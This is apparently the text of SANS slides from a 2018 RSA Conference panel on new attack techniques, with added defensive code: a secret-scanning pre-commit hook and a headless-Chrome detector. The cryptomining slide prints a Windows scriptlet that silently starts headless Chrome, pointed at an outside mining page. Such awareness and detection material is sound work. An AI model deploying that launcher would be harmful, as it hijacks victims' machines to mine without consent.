The Five Most Dangerous New Attack Techniques, and What’s to … · 2019-07-26 · The Five Most...
Moderator: Alan Paller
Speakers:
Ed Skoudis
Johannes Ullrich
Heather Mahalik
The Five Most Dangerous New Attack Techniques, and What’s to Come
December 5, 2018
© 2018 RSA Conference. All rights reserved.
About This Session
• An update on topics introduced during the keynote panel discussion at RSA Conference
• Please ask questions for our panelists for the Q&A section after the initial brief presentations
Cloud Data Repository Breaches and Weaponization of Big Data
Ed Skoudis
SANS Faculty Fellow and Pen Test Curriculum Lead
Director, SANS NetWars, CyberCity, and STX Projects
Repositories and Cloud Storage Data Leakage
• Software is built in a different way today
• Cloud-based collaboration, code repositories, and data storage
• GitHub, Amazon AWS/S3, Google Cloud Platform, Microsoft Azure, Docker Hub, etc.
• Private repositories accidentally marked public
• Public repositories with sensitive data in them (keys and passwords)
• Code and data put in the wrong repository
What You Can Do
• Data asset inventory
• Data curator
• Educate architects and developers
• Prevent developers from committing code with leaked creds:
  • git-seekret
  • git-secrets
• Search for sensitive information in repositories:
  • gitrob
• Review access logs associated with your assets
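As an added example (not from the presentation and not git-secrets' own code), a minimal pre-commit scanner in Python that checks only the lines a commit adds for the kinds of prohibited patterns git-secrets and git-seekret register; the regexes, the allowlist and the sample diff are this example's own constructions.

```python
import re
import sys

# Prohibited-pattern rules, approximating the kind git-secrets registers
# (assumed patterns for this example, not the tool's exact rules)
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"(?<![A-Z0-9])(AKIA|ASIA)[0-9A-Z]{16}(?![A-Z0-9])"),
    "aws_secret_key": re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?[A-Za-z0-9/+=]{40}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "password_literal": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*['\"][^'\"]{6,}['\"]"),
}
# Allowed matches: documentation placeholders that are not real credentials
ALLOWLIST = re.compile(r"AKIAIOSFODNN7EXAMPLE|EXAMPLEKEY")

def scan_diff(diff_text):
    """Scan the added (+) lines of a unified diff; return (file, new_line_no, rule) tuples."""
    findings, current_file, line_no = [], None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            current_file = raw[4:]
            current_file = current_file[2:] if current_file.startswith("b/") else current_file
            continue
        if raw.startswith("@@"):
            # "@@ -a,b +c,d @@": the first added/context line is line c in the new file
            line_no = int(re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", raw).group(1)) - 1
            continue
        if raw.startswith("-"):
            continue                      # removed lines (and "--- a/file") have no new line number
        line_no += 1
        if not raw.startswith("+"):
            continue                      # unchanged context line
        content = raw[1:]
        if ALLOWLIST.search(content):
            continue
        for rule, pattern in SECRET_PATTERNS.items():
            if pattern.search(content):
                findings.append((current_file, line_no, rule))
    return findings

# Constructed sample: the staged diff a hook would read from "git diff --cached"
SAMPLE_DIFF = """\
diff --git a/config/settings.py b/config/settings.py
--- a/config/settings.py
+++ b/config/settings.py
@@ -1,3 +1,5 @@
 DEBUG = False
+AWS_ACCESS_KEY_ID = "AKIAZZZZZZZZZZZZZZZZ"
+AWS_SECRET_ACCESS_KEY = "abcdefghijklmnopqrstuvwxyz0123456789ABCD"
 ALLOWED_HOSTS = ["example.org"]
+DOCS_SAMPLE_KEY = "AKIAIOSFODNN7EXAMPLE"
"""

if __name__ == "__main__":
    hits = scan_diff(SAMPLE_DIFF if sys.stdin.isatty() else sys.stdin.read())
    for path, line, rule in hits:
        print(f"{path}:{line}: {rule}")
    sys.exit(1 if hits else 0)   # a non-zero exit makes git abort the commit
```

Installed as `.git/hooks/pre-commit` and fed `git diff --cached`, the non-zero exit blocks the commit until the offending line is removed or allowlisted.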
• Uses machine learning to discover and classify sensitive data in Amazon S3 buckets
  • PII, intellectual property, etc.
• It then uses Amazon CloudWatch to monitor access looking for anomalies
• Price is $5 per GB protected, plus $4 per 100,000 events
Microsoft Azure SQL Database Threat Detection
• Uses machine learning to look at cloud-based SQL Server event logs for anomalous activity:
  • Suspicious access
  • Anomalous queries
  • Potential vulnerabilities
  • SQL injection attacks
• Price is $15 per database per month
Google’s Data Loss Prevention API
• Looks for over 70 predefined detectors for PII and other sensitive information
• Also looks for context clues
• Supports automated classification of data
• Integrate into your own applications built on Google’s infrastructure
• Complex pricing structure based on inspection units (IUs) and transformation units (TUs)…
  • 10 Giga Units are free
  • …then it’s $0.30 per GU after that
Weaponization of Big Data
• It’s not just about getting shell or exfiltrating specific PII for criminal use any more
• Increasingly, it’s about hacking the data itself
• Disparate sources and correlation
• De-anonymization and much more
• Are we fighting the last war?
• No, but a big new front is hugely relevant
Tim Cook Comments
"Our own information, from the everyday to the deeply personal, is being weaponized against us with military efficiency."
"We shouldn't sugarcoat the consequences. This is surveillance. And these stockpiles of personal data serve only to enrich the companies that collect them."
International Conference of Data Protection and Privacy Commissioners in Brussels in October 2018
Weaponization of Big Data Analytics
• March 2018: Announcement of Cambridge Analytica’s scraping and analysis of Facebook data for the 2016 election
• Oct 2018: Russian firms who build facial recognition software for the Russian government scraped Facebook image data
• 2015: OPM breach of 22 Million government employee and contractors’ data, plus 5.6 Million fingerprints
What You Can Do
• Be careful about exposing data, even if it seems innocuous
• Analyze business risks in terms of privacy implications
• Consider how your data could be used with others’ data to undermine your mission
• Learn about Open Source Intelligence (OSINT) and data analytics
• Holiday Hack Challenge 2017 Naughty and Nice List
• Holiday Hack Challenge 2018 coming in the next week or two
Cryptominer Update
Hardware Vulnerabilities
Johannes B. Ullrich, Ph.D.
Dean of Research, SANS Technology Inst.
Director of Internet Storm Center
Cryptocoin Mining – Prices are Dropping
[Chart: cryptocurrency price over time, Nov 2017 to Jul 2018, falling across the period]
Avg. PC: $10/year (end of 2018)
Miners are Improving
• Using less than 100% of CPU
• Private mining pools
• Root kits to evade detection
• Observing user behavior (turn off when system in use)
• Better tailoring to system capabilities
Example: Coinmining in Headless Browser
<!-- Windows scriptlet (COM registration): the embedded JScript runs when the scriptlet is loaded -->
<registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA00DABFC}">
  <script language="JScript"><![CDATA[
    // Start Chrome with no window (headless) and a remote-debugging port, pointed at the
    // obfuscated mining page, so the miner runs in a browser the user never sees
    var foo = new ActiveXObject("WScript.Shell").Run("chrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://slprmnr.tk/obfus.html");
  ]]></script>
</registration>
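An added detection example (not from the presentation) for the launch pattern shown above in process-creation telemetry: Chrome started headless with a remote-debugging port, escalated when the parent is a script host rather than the user's shell. The field names mimic Sysmon event 1, but the records, the script-host list and the URL are constructed for this example.

```python
import re

# Process images that normally do not spawn an interactive browser for the user.
# This set is an assumption of the example, not taken from the presentation.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "regsvr32.exe", "mshta.exe",
                "rundll32.exe", "powershell.exe"}

def image_name(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_headless_debug_chrome(event):
    """Return an alert dict for a headless Chrome launch with remote debugging, else None."""
    if image_name(event["Image"]) != "chrome.exe":
        return None
    cmdline = event["CommandLine"]
    switches = set(re.findall(r"--[a-z-]+", cmdline))
    port = re.search(r"--remote-debugging-port=(\d+)", cmdline)
    if "--headless" not in switches or port is None:
        return None
    parent = image_name(event["ParentImage"])
    return {
        "pid": event["ProcessId"],
        "parent": parent,
        "debug_port": int(port.group(1)),
        "urls": re.findall(r"https?://\S+", cmdline),
        # A script host as parent matches the scriptlet pattern: escalate severity
        "severity": "high" if parent in SCRIPT_HOSTS else "medium",
    }

def scan_events(events):
    return [a for a in map(detect_headless_debug_chrome, events) if a]

# Constructed sample events (Sysmon-style field names, invented values)
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --headless --disable-gpu --remote-debugging-port=9222 "
                    "http://miner.example/obfus.html"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" https://example.org/'},
    {"ProcessId": 5012, "ParentImage": r"C:\Users\dev\AppData\Local\Programs\node.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --headless --remote-debugging-port=9333 about:blank"},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

Developer tooling (Puppeteer, CI crawlers) also launches Chrome this way, which is why the parent image rather than the flags alone decides the severity.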
Return to IoT Mining
• 2014: Litecoin mining common payload for IoT exploits (e.g. DVRs)
• 2016: Mirai botnet: focus shifts to DDoS
• 2018: Coin miners are back (mostly Monero)
Hardware Issues Keep Coming
• March 2018: Branchscope
• May 2018: various Spectre variants
• August 2018: L1TF flaws
• Nov 2018: ECC Rowhammer demonstrated (first Feb 2017)
Never mind various BMC (Base Management Controller) issues and SPI flash vulnerabilities
Performance Issues / Patches
• Still vastly different numbers
• Some of the patches can add up to substantial losses
• Much depends on workload and operating system optimizations
• Patches delivered via operating system updates, but not available for older systems
Data Leakages from Mobile
Heather Mahalik
SANS Senior Instructor
Digital Forensics Expert
Privacy: Data Leakages from Smartphones
• Variety of operating systems
• Lacking updates and security features
• Apps, apps, and more apps
• Location tracking
• Cloud…
Mobile devices are one of the easiest platforms for attacks
Why the Mobile Device?
• Believe it or not, your phone knows more than you think!
• How attacks happen:
  • Application installs/permissions
  • Malware/Spyware
  • Stealing credentials
  • Cloud
Location Tracking
• Maps
• Navigation
• Hiding in application data
• EXIF data
• Health data
• Exercise apps
Just How Much Can Be Leaked?
The Social Media Nightmare
Ways to Mitigate
• Know what you install
• Read before saying “yes”
• Consider the pros and cons of 2FA
• Use a third-party authenticator:
  • Google Authenticator
  • GlobalSign
  • LastPass
  • Microsoft Authentication
Reality of Data Leakages from Mobile
• Great for Law Enforcement
• Awful for us!
• Can 2FA help or does it hurt us?
• If you think this is bad, wait until you see the cloud vulnerabilities and data leakages
Open Q&A